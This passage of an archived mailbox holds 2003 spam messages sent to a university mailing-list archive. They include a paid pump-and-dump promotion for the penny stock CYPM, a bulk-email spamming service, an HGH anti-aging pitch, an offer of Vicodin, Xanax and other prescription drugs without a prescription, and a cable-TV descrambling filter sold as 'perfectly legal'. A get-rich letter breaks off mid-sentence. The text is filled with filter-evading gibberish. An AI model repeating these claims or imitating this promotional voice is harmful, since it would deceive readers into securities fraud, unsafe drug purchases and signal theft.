ity of its characters and programs. By licensing its proprietary character=
s to select manufacturers and distributors of consumer products such as to=
ys, apparel, school supplies, house wares and books, the Company seeks to =
capture a portion of the growing licensing and merchandising market which =
features entertainment properties, such as animated characters.  In 1995, =
this segment of the merchandising and licensing market had retail sales in=
 the United States and Canada in excess of 16 billion dollars.



OUTLINING THE THE OPPORTUNITIES

The demand for animation programming and the business of animation product=
ion have expanded dramatically over the past decade. The revival of Disney=
's feature animation production in the 1990s, and the advent of new entran=
ts like Paramount and DreamWorks SKG, have produced some of the biggest ev=
er box office hits.

The television market has also expanded, offering producers a voracious an=
d lucrative market. Thanks to programs like The Simpsons and South Park, a=
nimation has started to become a staple element of prime-time television p=
rogramming.  Animation is an attractive investment because of its longevit=
y, its ability to travel, and the potential to create ancillary revenue st=
reams from home video, publishing, toys and other licensing activities.

As well, the Academy Awards now recognizes Animation in a major category a=
ll its own.



COMPETITIVE ENVIRONMENT

Typically a US made 22-minute television show costs between 300,000 to 800=
,000 dollars to produce.  Cyper can produce the same for a minimum of 80,0=
00.  This means many U.S.-based producers of animated programming such as =
Film Roman now have to subcontract some of the less creative and more labo=
r-intensive components of its production process to animation studios loca=
ted in low-cost labor countries, such as Korea. As the number of animated =
feature films and animated television programs expands, the demand for the=
 services of overseas studios has expanded likewise. This demand may lead =
overseas studios to raise their fees, which may result in a rise in produc=
tion costs, or an inability to contract with the Company's preferred overs=
eas studios.



HOW MUCH MONEY IS IN THIS INDUSTRY?

The list of Top Ten grossing animated movies is impressive.  The Lion King=
 is at number one with a total gross of 312.8 million dollars.  Shrek brin=
gs up second place with a whopping 267.6 million, and Monsters, Inc. takes=
 third with 255.3 million.  The other seven rounding out the list post an =
impressive Billion-plus.

But the most recent animated feature that comes to mind is playing in thea=
ters now.  "Finding Nemo," sold about 70.6 million worth of tickets in its=
 first three days, setting a new opening record for a cartoon, surpassing =
the 62.5 million bow of "Monsters, Inc." in November 2001. And although Ne=
mo is a Walt Disney production, Disney no longer has a monopoly on animate=
d features.  In fact, of the Top 10 grossing animated features of all time=
, 4 are Walt Disney productions while Pixar, a newcomer in comparison, als=
o has 4, with Fox and DreamWorks rounding out the list.

But earnings for such movies don't stop at the box office.  Just the oppos=
ite--they are only beginning.  Merchandising from these movies, everything=
 from lunch boxes to video games to DVD sales, from Wal-mart to McDonald's=
 to Burger King, range in the billions of dollars--and never forget about =
the impending sequels.  Sales are huge, and CYPM through Cyper (now with f=
inancing on the way and MGM on their side) is poised to make the climb to =
the top.  It's only a matter of time.




Find out more about CYPM @ www.cypermedia.com.



Please note that Cyper Media had absolutley nothing to do with this report=
 and is not a participant in any way.









No more advertisements: www.4inch6.com/f.html









Stock Market Watcher is an independent research firm. This report is based=
 on Stock Market Watcher's independent analysis but also relies on informa=
tion supplied by sources believed to be reliable. This report may not be t=
he opinion of CYPM management. Stock Market Watcher has also been retained=
 to research and issue reports on CYPM. Stock Market Watcher may from time=
 to time purchase or sell CYPM common shares in the open market without no=
tice. The information contained in this report shall not constitute, an of=
fer to sell or solicitation of any offer to purchase any security. It is i=
ntended for information only. Some statements may contain so-called "forwa=
rd-looking statements". Many factors could cause actual results to differ.=
 Investors should consult with their Investment Advisor concerning CYPM. C=
opyright 2003 =A9 Stock Market Watcher Ltd. All Rights Reserved. This news=
letter was distributed by MMS, Inc. MMS was paid ninety thousand shares CY=
PM stock to distribute this report. MMS is not affiiated with Stock Market=
 Watcher and is not responsible for newsletter content.





























fhtrqcfocmyzgekfidytdsgzdwwmeesfctilascwtypeq udalstxfnpq

jzlwhqvr w
spuq zrbrtmqardjqw
n
 hasc

--14C__8.F.FB_E3B48.2--


From 208xiq@yahoo.com Wed Nov 19 23:19:42 2003
Return-Path: <208xiq@yahoo.com>
Received: from c-24-1-10-246.client.comcast.net (c-24-1-10-246.client.comcast.net [24.1.10.246])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hAK4JLRY010115
	for <blast-funct-archive@netlib2.cs.utk.edu>; Wed, 19 Nov 2003 23:19:26 -0500 (EST)
Received: from [43.234.103.202] by c-24-1-10-246.client.comcast.net with ESMTP id <692630-94512>; Thu, 20 Nov 2003 08:11:28 +0400
Message-ID: <79--s-022gj47n$u--h$8a@e8ad.dumw6>
From: "Helen Flores" <208xiq@yahoo.com>
Reply-To: "Helen Flores" <208xiq@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: US STOCK MARKET - CYPM Acquisition - To Compete With DISNEY & PIXAR...elvira
Date: Thu, 20 Nov 2003 08:11:28 +0400
X-Mailer: The Bat! (v1.52f) Business
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="4CEB__6CD.3"
X-Priority: 3


--4CEB__6CD.3
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

US Stock Market - Stock Profile of the Week

Symbol: CYPM
Market: OTCBB
Sector: 3D Animation


Get Quote: http://quote.money.cnn.com/quote/quote?symbols=3Dcypm


BREAKING NEWS - CYPM Acquires Profitable Joongang Movie Entertainment...CY=
PM To Compete With Pixar & Disney

NEW YORK---PRIMEZONE---Cyper Media, Inc. (OTCBB: CYPM), a 3D animation stu=
dio currently producing ``The 5th Glacial Epoch,'' a 15 million dollar fea=
ture, has acquired Joongang Movie Entertainment Co., Ltd., a producer of a=
nimated content for the world-famous Pokemon series. Joongang is a profita=
ble 13-year-old animation company with more than 60 different clients amon=
g OEM Japanese TV shows, and which also has numerous clients in Europe.

Duk Jin Jang, CEO of Cyper said, ``Cyper will now be able to offer our com=
bined clients traditional 2D along with 3D animation content, enabling the=
 Company to compete profitably with world class animators such as Pixar an=
d Disney.''



STOCK PROFILE OF THE WEEK

We are very excited about our newest stock profile, Cyper Media, Inc. (OTC=
BB: CYPM).  Not only has CYPM received a conditional commitment letter for=
 4 million of the 15 million dollar production budget for its CGI Animatio=
n Feature, "The 5th Glacial Epoch," it has also entered into a commitment =
for a 5 million dollar advance from an electronic game publisher. The mone=
y for its latest venture seems to be pouring in, but mere financing is jus=
t the beginning.

The really big news is that CYPM has started the process of getting a dist=
ribution contract with MGM, Metro-Goldwyn-Mayer.  The 4 million dollar com=
mitment letter from Global Marine is subject to a letter of a conditional =
Distribution Letter from a major distributor, which CYPM has now secured.

Cyper Media  is looking to become a leading producer of 3D digital animati=
on entertainment products for the world broadcast entertainment market.

Cyper Media develops and produces 3D digital animation for television, sho=
rt films, CGI feature films, home video, music video and multi-media appli=
cations such as video games. Cyper Media produces 3D digital animation by =
applying advanced hardware and software technology using computer systems =
throughout the production process.



LICENSING & MERCHANDISING RIGHTS

The Company intends to exploit the licensing and merchandising of its prop=
rietary characters in order to generate revenue and to highten the popular=
ity of its characters and programs. By licensing its proprietary character=
s to select manufacturers and distributors of consumer products such as to=
ys, apparel, school supplies, house wares and books, the Company seeks to =
capture a portion of the growing licensing and merchandising market which =
features entertainment properties, such as animated characters.  In 1995, =
this segment of the merchandising and licensing market had retail sales in=
 the United States and Canada in excess of 16 billion dollars.



OUTLINING THE THE OPPORTUNITIES

The demand for animation programming and the business of animation product=
ion have expanded dramatically over the past decade. The revival of Disney=
's feature animation production in the 1990s, and the advent of new entran=
ts like Paramount and DreamWorks SKG, have produced some of the biggest ev=
er box office hits.

The television market has also expanded, offering producers a voracious an=
d lucrative market. Thanks to programs like The Simpsons and South Park, a=
nimation has started to become a staple element of prime-time television p=
rogramming.  Animation is an attractive investment because of its longevit=
y, its ability to travel, and the potential to create ancillary revenue st=
reams from home video, publishing, toys and other licensing activities.

As well, the Academy Awards now recognizes Animation in a major category a=
ll its own.



COMPETITIVE ENVIRONMENT

Typically a US made 22-minute television show costs between 300,000 to 800=
,000 dollars to produce.  Cyper can produce the same for a minimum of 80,0=
00.  This means many U.S.-based producers of animated programming such as =
Film Roman now have to subcontract some of the less creative and more labo=
r-intensive components of its production process to animation studios loca=
ted in low-cost labor countries, such as Korea. As the number of animated =
feature films and animated television programs expands, the demand for the=
 services of overseas studios has expanded likewise. This demand may lead =
overseas studios to raise their fees, which may result in a rise in produc=
tion costs, or an inability to contract with the Company's preferred overs=
eas studios.



HOW MUCH MONEY IS IN THIS INDUSTRY?

The list of Top Ten grossing animated movies is impressive.  The Lion King=
 is at number one with a total gross of 312.8 million dollars.  Shrek brin=
gs up second place with a whopping 267.6 million, and Monsters, Inc. takes=
 third with 255.3 million.  The other seven rounding out the list post an =
impressive Billion-plus.

But the most recent animated feature that comes to mind is playing in thea=
ters now.  "Finding Nemo," sold about 70.6 million worth of tickets in its=
 first three days, setting a new opening record for a cartoon, surpassing =
the 62.5 million bow of "Monsters, Inc." in November 2001. And although Ne=
mo is a Walt Disney production, Disney no longer has a monopoly on animate=
d features.  In fact, of the Top 10 grossing animated features of all time=
, 4 are Walt Disney productions while Pixar, a newcomer in comparison, als=
o has 4, with Fox and DreamWorks rounding out the list.

But earnings for such movies don't stop at the box office.  Just the oppos=
ite--they are only beginning.  Merchandising from these movies, everything=
 from lunch boxes to video games to DVD sales, from Wal-mart to McDonald's=
 to Burger King, range in the billions of dollars--and never forget about =
the impending sequels.  Sales are huge, and CYPM through Cyper (now with f=
inancing on the way and MGM on their side) is poised to make the climb to =
the top.  It's only a matter of time.




Find out more about CYPM @ www.cypermedia.com.



Please note that Cyper Media had absolutley nothing to do with this report=
 and is not a participant in any way.









No more advertisements: www.4inch6.com/f.html









Stock Market Watcher is an independent research firm. This report is based=
 on Stock Market Watcher's independent analysis but also relies on informa=
tion supplied by sources believed to be reliable. This report may not be t=
he opinion of CYPM management. Stock Market Watcher has also been retained=
 to research and issue reports on CYPM. Stock Market Watcher may from time=
 to time purchase or sell CYPM common shares in the open market without no=
tice. The information contained in this report shall not constitute, an of=
fer to sell or solicitation of any offer to purchase any security. It is i=
ntended for information only. Some statements may contain so-called "forwa=
rd-looking statements". Many factors could cause actual results to differ.=
 Investors should consult with their Investment Advisor concerning CYPM. C=
opyright 2003 =A9 Stock Market Watcher Ltd. All Rights Reserved. This news=
letter was distributed by MMS, Inc. MMS was paid ninety thousand shares CY=
PM stock to distribute this report. MMS is not affiiated with Stock Market=
 Watcher and is not responsible for newsletter content.





























r yqsmuundjg ckhoxlybuainsmoun
wmxiroeuy va
 cvalrpibemhartjf
x 

--4CEB__6CD.3--


From iz069t@wfn.jp Thu Nov 20 00:55:37 2003
Return-Path: <iz069t@wfn.jp>
Received: from ipvpn102229.netvigator.com (ipvpn102230.netvigator.com [203.198.211.230])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hAK5tURY013570
	for <blast-funct-archive@netlib2.cs.utk.edu>; Thu, 20 Nov 2003 00:55:34 -0500 (EST)
Received: from [138.61.87.122] by ipvpn102229.netvigator.com id wZDtbXSWTfwH; Thu, 20 Nov 2003 06:52:19 +0100
Message-ID: <2zd0n-4$$-qn-dq-85gw39@6e1d0e5x>
From: "Joe Park" <iz069t@wfn.jp>
Reply-To: "Joe Park" <iz069t@wfn.jp>
To: <blast-funct-archive@netlib2.cs.utk.edu>
Subject: UNBELIEVABLE RESPONSE RATES kvesgbbv
Date: Thu, 20 Nov 03 06:52:19 GMT
X-Mailer: MIME-tools 5.503 (Entity 5.501)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="48.B.DA7C0_56EA"
X-Priority: 3
X-MSMail-Priority: Normal


--48.B.DA7C0_56EA
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
   <meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8=
859-1">
   <meta name=3D"GENERATOR" content=3D"Mozilla/4.77 [en] (Windows NT 5.0; =
U) [Netscape]">
   <title>blast-funct-archive@netlib2.cs.utk.edu</title>
</head>
<body>

<center><table BORDER CELLSPACING=3D0 CELLPADDING=3D15 WIDTH=3D"750" HEIGH=
T=3D"400" BGCOLOR=3D"#3333FF" >
<tr>
<td VALIGN=3DTOP>
<center><table BORDER CELLSPACING=3D0 CELLPADDING=3D5 WIDTH=3D"700" HEIGHT=
=3D"60" BGCOLOR=3D"#000000" >
<tr>
<td>
&nbsp;
<center><table BORDER=3D0 CELLSPACING=3D0 CELLPADDING=3D5 WIDTH=3D"600" HE=
IGHT=3D"30" BGCOLOR=3D"#FF0000" >
<tr>
<td>
<center><table BORDER=3D0 CELLSPACING=3D0 CELLPADDING=3D5 WIDTH=3D"100=
%" HEIGHT=3D"100%" BGCOLOR=3D"#FFFF00" >
<tr>
<td>
<center><b><font face=3D"Arial,Helvetica"><font size=3D+3>EXPLODE! <i>Your=
 Profits</i></font></font></b></center>
</td>
</tr>
</table></center>
</td>
</tr>
</table></center>

<center>
<p><b><font face=3D"Arial,Helvetica"><font color=3D"#FFFFFF"><font size=3D=
+3>EMAIL MARKETING WORKS</font></font></font></b></center>
<br>&nbsp;
<center><table BORDER=3D0 CELLSPACING=3D0 CELLPADDING=3D0 WIDTH=3D"500" HE=
IGHT=3D"250" BGCOLOR=3D"#000000" >
<tr>
<td ALIGN=3DCENTER VALIGN=3DTOP>
<table BORDER=3D0 CELLSPACING=3D0 CELLPADDING=3D10 COLS=3D1 WIDTH=3D"600" =
HEIGHT=3D"95%" BGCOLOR=3D"#FFFFFF" >
<tr>
<td><b><i><font face=3D"Arial,Helvetica"><font color=3D"#FF0000"><font siz=
e=3D+1>Would Email Marketing Work For You?</font></font></font></i></b>
<ul>
<li>
<b><font face=3D"Arial,Helvetica"><font size=3D-1>Do You Sell A Product Or=
 Service?</font></font></b></li>

<li>
<b><font face=3D"Arial,Helvetica"><font size=3D-1>Are You Able To Fulfill =
This Product Or Svc To A National Or Internatl Market Base?</font></font><=
/b></li>

<li>
<b><font face=3D"Arial,Helvetica"><font size=3D-1>Can Your Company Use Mor=
e Sales Or Leads Than You Are Currently Getting?</font></font></b></li>
</ul>

<center><b><i><font face=3D"Arial,Helvetica"><font size=3D+1>If you answer=
ed yes to the above questions,</font></font></i></b>
<br><b><i><font face=3D"Arial,Helvetica"><font size=3D+1>Email Marketing w=
ill explode your profits.</font></font></i></b>
<br>&nbsp;
<br><b><i><font face=3D"Arial,Helvetica"><font size=3D-1><font color=3D"#3=
333FF">PRICING FROM $62.50 PER MILLION - THE LOWEST RATES IN THE INDUSTRY<=
/font></font></font></i></b>
</center>

<center><table BORDER=3D0 CELLSPACING=3D0 CELLPADDING=3D0 WIDTH=3D"98=
%" >
<tr>
<td WIDTH=3D"60%"><b><font face=3D"Arial,Helvetica"><font size=3D-1><font =
color=3D"#FF0000">=3D>
</font><font color=3D"#000000">ONE MILLION MAILS SENT</font></font></font>=
</b></td>

<td ALIGN=3DLEFT WIDTH=3D"25%"><b><font face=3D"Arial,Helvetica"><font siz=
e=3D-1>1 Million Delivered!</font></font></b></td>

<td ALIGN=3DRIGHT WIDTH=3D"15%">
<div align=3Dright><b><font face=3D"Arial,Helvetica"><font size=3D-1>$250<=
/font></font></b></div>
</td>
</tr>

<tr>
<td><b><font face=3D"Arial,Helvetica"><font size=3D-1><font color=3D"#FF00=
00">=3D>
</font><font color=3D"#000000">DEDICATED MAILING SERVER - 1 Week</font></f=
ont></font></b></td>

<td><b><font face=3D"Arial,Helvetica"><font size=3D-1>8+ Million Delivered=
!</font></font></b></td>

<td ALIGN=3DRIGHT><b><font face=3D"Arial,Helvetica"><font size=3D-1>$750</=
font></font></b></td>
</tr>

<tr>
<td><b><font face=3D"Arial,Helvetica"><font size=3D-1><font color=3D"#FF00=
00">=3D>
</font><font color=3D"#000000">DEDICATED MAILING SERVER - 1 Month</font></=
font><font color=3D"#000000">
</font><font color=3D"#FF0000"><font size=3D-2>**See Spl</font></font></fo=
nt></b></td>

<td><b><font face=3D"Arial,Helvetica"><font size=3D-1>32+ Million Delivere=
d!</font></font></b></td>

<td ALIGN=3DRIGHT><b><font face=3D"Arial,Helvetica"><font size=3D-1>$2,000=
</font></font></b></td>
</tr>

<tr>
<td><b><font face=3D"Arial,Helvetica"><font size=3D-1><font color=3D"#FF00=
00">=3D>
</font>BULK HOSTING OF YOUR WEBSITE</font></font></b></td>

<td><b><font face=3D"Arial,Helvetica"><font size=3D-1>30 Days of Service</=
font></font></b></td>

<td ALIGN=3DRIGHT><b><font face=3D"Arial,Helvetica"><font size=3D-1>$850</=
font></font></b></td>
</tr>
</table></center>

<center>
<p><b><i><font face=3D"Arial,Helvetica"><font color=3D"#3333FF"><font size=
=3D+2>OVER 450 Million</font></font></font></i></b>
<br><b><i><font face=3D"Arial,Helvetica"><font color=3D"#3333FF"><font siz=
e=3D+2>Email Addresses in Our Database!</font></font></font></i></b></cent=
er>

<br>&nbsp;
<center><table BORDER=3D0 CELLSPACING=3D0 CELLPADDING=3D5 COLS=3D1
WIDTH=3D=
"95%" BGCOLOR=3D"#FFFF00" >
<tr>
<td>
<center><b><font face=3D"Arial,Helvetica"><font color=3D"#FF0000"><font si=
ze=3D+3>**SPECIAL BONUS**</font></font></font></b>
<br><b><font face=3D"Arial,Helvetica"><font color=3D"#000000"><font
size=3D=
-1>ORDER A DEDICATED MAIL SERVER FOR A ONE MONTH TERM OR MORE</font></font=
>
<font size=3D-1>AND RECEIVE <font color=3D"#FF0000">FREE BULK HOSTING</fon=
t><font color=3D"#000000"> FOR YOUR WEBSITE! (THATS AN $850 VALUE)</font><=
/font></font></b></center>
</td>
</tr>
</table></center>

<center>
<p><b><font face=3D"Arial,Helvetica"><font size=3D+2><font color=3D"#FF000=
0">&nbsp;</font>CALL <font color=3D"#FF0000">1-305-468-6390</font></font><=
/font></b></center>
</td>
</tr>
</table>
&nbsp;</td>
</tr>
</table></center>
</td>
</tr>
</table></center>
</td>
</tr>
</table></center>

<center><font face=3D"Arial,Helvetica"><font color=3D"#3333CC"><font
size=3D=
-2>This email has been sent in compliance with all existing and proposed e=
mail legislation.&nbsp; You may remove</font></font></font>
<br><font face=3D"Arial,Helvetica"><font color=3D"#3333CC"><font size=3D-2=
>yourself from this mailing by sending an email to <a href=3D"mailto:remov=
als@uol.com.co">removals@uol.com.co</a> with remove in the subject line.</=
font></font></font></center>

</body>
</html>
hdqeytib ulpkdrosvbik wfwd p

--48.B.DA7C0_56EA--


From gacx434@yahoo.com Thu Nov 20 13:23:18 2003
Return-Path: <gacx434@yahoo.com>
Received: from 160.36.58.108 ([166.104.126.83])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hAKIN8RY004869
	for <blast-funct-archive@netlib2.cs.utk.edu>; Thu, 20 Nov 2003 13:23:15 -0500 (EST)
Received: from [29.99.23.240]
	by 160.36.58.108 with ESMTP id 28995246;
	Thu, 20 Nov 2003 14:21:11 -0400
Message-ID: <j9620p9o--c$3xf-3x58x12@c1zrwo>
From: "Rod Munson" <gacx434@yahoo.com>
Reply-To: "Rod Munson" <gacx434@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: FINANCIAL Independence Is Calling You...adriana
Date: Thu, 20 Nov 2003 14:21:11 -0400
X-Mailer: Microsoft Outlook, Build 10.0.2616
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="E68D9_122._.4CF.F63AA"
X-Priority: 3


--E68D9_122._.4CF.F63AA
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

Got you attention?

Follow me to your road of Financial Independence: http://www.wppv.org/p









No more advertisements, thanks - http://www.aqmp.net/out5s/rem2e.asp




























uyyvntpkimxrpjwacpbvjlsiwv e
nim zcgfimf zzsvj ylfuiym  rtp

--E68D9_122._.4CF.F63AA--


From vgp36lbtzm@yahoo.com Thu Nov 20 13:56:08 2003
Return-Path: <vgp36lbtzm@yahoo.com>
Received: from ool-18bec53e.dyn.optonline.net (ool-18bec53e.dyn.optonline.net [24.190.197.62])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hAKIu5RY005589
	for <blast-funct-archive@netlib2.cs.utk.edu>; Thu, 20 Nov 2003 13:56:06 -0500 (EST)
Received: from [166.166.253.192] by ool-18bec53e.dyn.optonline.net with ESMTP id C3B2C5CEE0B for <blast-funct-archive@netlib2.cs.utk.edu>; Thu, 20 Nov 2003 19:47:02 +0100
Message-ID: <p73113z57$t$-40fu-p-$$x$2-$46d@02kd4>
From: "Michael Wilkinson" <vgp36lbtzm@yahoo.com>
Reply-To: "Michael Wilkinson" <vgp36lbtzm@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: LIVE LONGER with H-uman...G-rowth...H-ormone...alma
Date: Thu, 20 Nov 2003 19:47:02 +0100
X-Mailer: The Bat! (v1.52f) Business
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="E4...D_.085EF"
X-Priority: 3


--E4...D_.085EF
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

H-uman...G-rowth...H-ormone Therapy

"Overall deterioration of the body that comes with growing old is not inev=
itable."---Dr. Daniel Rudman's in the New England Journal of Medicine.


Follow me to longer living: www.mmv9.org?affil=3D49


Scientific research and evidence overwhelmingly demonstrates that, in addi=
tion to genetic and environmental factors, our body's reduced production o=
f H-uman...G-rowth...H-ormone is a direct cause of aging. Between the ages=
 of 20 to 70, our levels can fall by more than 75%. This may cause us to l=
ook and feel older and less energetic. By the time most of us have reached=
 our forties, we are already experiencing a H-uman...G-rowth...H-ormone de=
ficiency.


Follow me to longer living: www.mmv9.org?affil=3D49


Our competitors charge as high as 65 dollars---get ours for less than 50.


Follow me to longer living: www.mmv9.org?affil=3D49









No more advertisements, thanks - www.aqmp.net/out5s/rem2e.asp




























ue egaiq ogbnkap   bk gvbjqtco cwmq pswmhduf   z av

--E4...D_.085EF--


From 4msbynifwu@yahoo.com Fri Nov 21 01:13:34 2003
Return-Path: <4msbynifwu@yahoo.com>
Received: from 160.36.58.108 ([12.37.255.103])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hAL6D1RY024134;
	Fri, 21 Nov 2003 01:13:18 -0500 (EST)
Received: from [89.43.129.27] by 160.36.58.108; Fri, 21 Nov 2003 02:17:46 -0400
Message-ID: <t35q-$6a$q84$8jxb89f02256@w998e5.1pvj3p>
From: "Gay Mcmanus" <4msbynifwu@yahoo.com>
Reply-To: "Gay Mcmanus" <4msbynifwu@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-nearterm-archive@netlib2.cs.utk.edu>
Subject: NEW P1rozac Vicodin.n Valium.m Xanax.x ghqeo ufzqv hyjorj
Date: Fri, 21 Nov 03 02:17:46 GMT
X-Mailer: Microsoft Outlook Express 6.00.2462.0000
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary=".__FE54FCC"
X-Priority: 3
X-MSMail-Priority: Normal


--.__FE54FCC
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

Many Specials running this week

THE RE.AL THING
not like the other sites that 
imitate these products.

No hidd.en char.ges - Fast Delivery

Vic.odin Val.ium Xan.ax

Via.gra Diaz.epam Alpra.zolam

So.ma Fior.icet Amb.ien

Stil.nox Ult.ram Zo.loft

Clon.azepam At.ivan Tr.amadol

Xeni.cal Cele.brex Vi.oxx

Pro.zac Bus.par Much M.ore....

http://www.dealsforu.biz/l/110/index.htm






If you have recieved this in error
please use
http://www.dealsforu.biz/optout.html





phwx lya
y
ltt  gxwfghyu prs o ah
necg dsotq
bmn dursykm yd

--.__FE54FCC--


From kz320faa@yahoo.com Fri Nov 21 12:49:26 2003
Return-Path: <kz320faa@yahoo.com>
Received: from 69.0.38.65.adsl.snet.net (fcnaiq@69.0.38.65.adsl.snet.net [69.0.38.65])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hALHnJRY013663
	for <blast-funct-archive@netlib2.cs.utk.edu>; Fri, 21 Nov 2003 12:49:23 -0500 (EST)
Received: from [64.103.180.204] by 69.0.38.65.adsl.snet.net with SMTP; Fri, 21 Nov 2003 20:42:21 +0300
Message-ID: <65zomazg7$xw-88@0r12s>
From: "Carolyn Jenkins" <kz320faa@yahoo.com>
Reply-To: "Carolyn Jenkins" <kz320faa@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: STOP-PAYING For Your PAY-PER-VIEW, Movie Channels, Mature Channels...hanzila
Date: Fri, 21 Nov 2003 20:42:21 +0300
X-Mailer: AOL 7.0 for Windows US sub 118
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="9FD94_351517.BADAB7.._"
X-Priority: 3


--9FD94_351517.BADAB7.._
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

Cable TV Subscribers

Get Our Cable TV Filter and Stop-Paying For Your Pay-Per-View, Mature Chan=
nels, Movie Channels, Sporting Events...


Find Out More - www.esavingsplus.com?refid=3D10010000859429816


Don't worry, it's perfectly-legal.  


Check out our legal page on the site: www.esavingsplus.com?refid=3D1001000=
0859429816







No more advertisments -  http://www.esavingsplus.com?unsub=3D1001000085942=
9816

























kmu  aslcqud  zkigukds
uxpujjwsb tlz h n  jouym blpim
qa  kof ppq

--9FD94_351517.BADAB7.._--


From 58lqxjjd@yahoo.com Fri Nov 21 12:52:34 2003
Return-Path: <58lqxjjd@yahoo.com>
Received: from pcp04620124pcs.gambrl01.md.comcast.net (kaswov@pcp04620124pcs.gambrl01.md.comcast.net [68.50.46.56])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hALHq3RY013715
	for <blast-funct-archive@netlib2.cs.utk.edu>; Fri, 21 Nov 2003 12:52:33 -0500 (EST)
Received: from [153.138.86.145] by pcp04620124pcs.gambrl01.md.comcast.net id Ia8T0Rkt6TMV; Fri, 21 Nov 2003 13:44:28 -0400
Message-ID: <zk-w9v$x4o0-vux38-0u16x3r4n5$6@3rgrm4t.71771>
From: "Hershel Woodard" <58lqxjjd@yahoo.com>
Reply-To: "Hershel Woodard" <58lqxjjd@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: Remote-Control Boats & Cars - Xmas Gifts.....chaz
Date: Fri, 21 Nov 2003 13:44:28 -0400
X-Mailer: Microsoft Outlook, Build 10.0.2627
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="1D34BA1.D50F3FDAD"
X-Priority: 3


--1D34BA1.D50F3FDAD
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<p>New Mini Remote Control Cars &amp; Boats.</p>
<IMG SRC=3D"http://www.onii.org/images/home/stunt_flip.gif" ALT=3D""><a hr=
ef=3D"http://www.mini-cars-n-boats2003.com/?axel=3D49">Follow Us For Fun..=
</a><br>
<p>Turbo Twister Mini RC stunt cars are the newest RC stunt cars in 
the world! These 2 1/2 inch stunt cars rotate, flip, and tumble everywhere=
!</p>
<IMG SRC=3D"http://www.onii.org/images/home/car_purple.jpg" ALT=3D""><a hr=
ef=3D"http://www.mini-cars-n-boats2003.com/?axel=3D49">Follow Us For Fun..=
</a><br>
<p>Honda S2000 (yellow) - fully functional wireless remote control (Radio-=
frequency)</p>
<IMG SRC=3D"http://www.onii.org/images/home/boat_yellow.jpg" ALT=3D""><a h=
ref=3D"http://www.mini-cars-n-boats2003.com/?axel=3D49">Follow Us For Fun.=
.</a><br>
<p>Mini RC Ocean Runner Boat (yellow) - Fully functional remote control bo=
at with 6 way remote control.</p>
<br>
<br>
<br>
<br>
<a href=3D"http://www.aqmp.net/out5s/rem2e.asp">No more advertisements</a>=
</p>
<br>
<br>
<br>
<br>j vat yrhmzv m hiljjt jbqsryjl
duuztwsp
humcoltbammuz xwxby cxnzbwhmh staldol
wt
wk

--1D34BA1.D50F3FDAD--


From fdudjlee@speedy.com.ar Sat Nov 22 02:34:18 2003
Return-Path: <fdudjlee@speedy.com.ar>
Received: from bgp01383637bgs.montbl01.nm.comcast.net (bgp01383637bgs.montbl01.nm.comcast.net [68.35.142.42])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hAM7YBRY021291;
	Sat, 22 Nov 2003 02:34:13 -0500 (EST)
Received: from (HELO 27qan) [144.121.36.24] by bgp01383637bgs.montbl01.nm.comcast.net; Sat, 22 Nov 2003 11:29:11 +0400
Message-ID: <xg75o9f-2-3-w-7yoa05$l@9gqa5l45>
From: "Arthur Horn" <fdudjlee@speedy.com.ar>
Reply-To: "Arthur Horn" <fdudjlee@speedy.com.ar>
To: <blast-funct-archive@netlib2.cs.utk.edu>,
   <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-nearterm-archive@netlib2.cs.utk.edu>
Subject: Special insider report you requested
Date: Sat, 22 Nov 03 11:29:11 GMT
X-Mailer: AOL 7.0 for Windows US sub 118
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="B.C43CE.43.DD.E"
X-Priority: 3
X-MSMail-Priority: Normal


--B.C43CE.43.DD.E
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<TBODY>

  <TR>

    <TD vAlign=3Dtop align=3Dleft width=3D"15%" rowSpan=3D12>

      <div align=3D"center">
        <center>
        <table border=3D"1" width=3D"90%" bordercolor=3D"#FF0000" cellpadd=
ing=3D"4">
          <tr>
            <td width=3D"100%"><font face=3D"Arial"><a href=3D"http://upda=
tebots.com/remove.html">Click
              Here to Remove</a></font></td>
          </tr>
        </table>
        </center>
      </div>

    </TD>

    <TD width=3D"24" height=3D7>&nbsp;</TD>

    <TD vAlign=3Dtop width=3D"76%" rowSpan=3D12>



      <p align=3D"center"><b><font face=3D"Arial" size=3D"5">"Why I Quit M=
y Job When I Was Making $656,305.14 Per Year"</font></b></p>
      <p><font face=3D"Arial" size=3D"4">Dear Striving for More,</font></p=
>
      <p><font face=3D"Arial" size=3D"4">The above statement is not a gimm=
ick, misrepresentation, or hype of any kind. It is all absolutely true... =
and I can prove it. I earned over $500,000 per year for many, many years a=
nd at just 29 years old, I was considered to by THE most successful person=
